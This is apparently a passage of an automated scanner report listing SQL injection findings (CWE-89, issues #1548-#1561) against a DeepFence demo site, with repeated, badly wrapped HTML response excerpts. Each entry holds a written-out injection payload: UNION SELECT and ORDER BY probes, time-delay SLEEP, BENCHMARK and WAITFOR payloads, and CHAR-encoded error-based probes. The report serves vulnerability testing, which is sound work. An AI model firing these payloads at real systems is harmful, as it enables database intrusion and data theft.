href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1548\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1549\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1550\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1551\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1552\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1553\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\n4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1554\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# waitfor delay '00:00:05'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1555\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' GROUP BY columnnames having 1=\n1 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1556\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# @variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1557\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1558\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1559\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1560\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1561\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 